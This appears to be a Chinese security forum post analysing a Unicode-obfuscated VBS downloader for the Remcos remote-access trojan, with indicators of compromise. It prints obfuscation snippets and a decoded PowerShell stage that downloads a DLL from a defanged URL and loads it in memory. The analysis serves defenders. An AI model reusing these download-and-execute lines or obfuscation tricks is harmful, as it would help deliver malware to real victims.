DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 5323|回复: 1

[样本分析] 带有 Unicode 混淆的 Remcos 下载器

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-11-4 15:53:05 | 显示全部楼层 |阅读模式

我发现了一个包含 VBS 脚本的恶意 RAR 存档,名为 "Unidad Justice citacion pendiente Fiscalia.rar",用一个简单的 4 位密码保护以阻止自动扫描。在内部,VBS 脚本具有相同的名称。 两者都不为 VT 所知。

该文件具有愚蠢 (但仍然有效) 的技巧来污染代码,例如注释 (以单引号开头的行) 和标签 (以冒号结尾的行)。请注意,可以在一行中加入多个标签:

  1. IzGPO:yWNxx:IOfaI:Cvghz:qfPU:aDHqa:LxWPC:ULLtt:YwPsT
复制代码

VBS 脚本对一些代码进行去混淆处理并启动 PowerShell 解释器,主要数据是 Base64 编码的,但 unicode 字符被注入:



同样,许多工具都无法正确处理非常简单 unicode 字符,尤其是在 Linux 上。如果尝试在 Linux shell 中显示脚本,将看不到有趣的代码!

可疑函数被混淆并通过其他函数调用,该脚本有多个保留字符串。"StrReverse" 是这样处理的:

  1. Function BgkX(GGMtp)
  2.   dim MDje
  3.   MDje = "BgkX = "
  4.   MDje = MDje + "SNdPZOtrNdPZORevNdPZOerse"
  5.   MDje = BeWD(MDje,"NdPZO","")
  6.   MDje = MDje + "(GGMtp)"
  7.   execute(MDje)
  8. End Function
复制代码

execute() 语句类似于 Javascript 中的 eval(),接受一个字符串参数并将其解释为 VBS 语句或语句序列

另一个混淆:



这是执行的 PowerShell 脚本 (美化):

  1. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command \
  2. $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAI (payload removed) AA9ACAAJwA???ASwBhAGIAJwAgACkAKQA='; \
  3. $OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('???','U') ) ); \
  4. $OWjuxD = $OWjuxD.replace('??????????', 'C:\Users\user01\AppData\Local\Temp\Unidad judicial cita.vbs'); \
  5. powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
复制代码

下一个解码的 Base64 有效载荷 (也被垃圾字符污染) 是:

  1. $RodaCopy = '–¯¯––¯––¯¯'; [Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('hxxps://tinyurl[.]com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('0/Ev3d1/d/ee.etsap//:sptth' , $RodaCopy , 'd3vEKab' ))
复制代码

从 hxxps://tinyurl[.]com/2erph6cs (SHA255:49562fda46cfa05b2a6e2cb06a5d25711c9a435b578a7ec375f928aae9c08ff2) 下载 DLL。 它已经在 VT 上,得分为 40/69[1]。 DLL 使用 AppDomain.Load 方法在当前进程中加载,并从反向 URL 启动 Remcos 示例 (SHA256: ee1e6615088a95b6d401603fc0f46b105a453eecbd8131305443983b6d32151f)。

C2 服务器是 deferos2.con-ip[.]com:2425。

几个月前我已经看到了这种感染技术,但它似乎仍然有效并且仍然在野外。 许多安全控件,尤其是在 Linux 上运行的安全控件,都存在正确处理 Unicide 字符的问题!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x

0

主题

11

回帖

0

荣誉

Rank: 1

UID
1429
积分
2
精华
0
沃币
9 枚
注册时间
2023-8-10
发表于 2023-8-11 11:03:55 | 显示全部楼层
没看懂,太高深了
产权交易 https://www.ejy365.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1楼
2楼

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-12-22 14:52 , Processed in 0.064588 second(s), 26 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表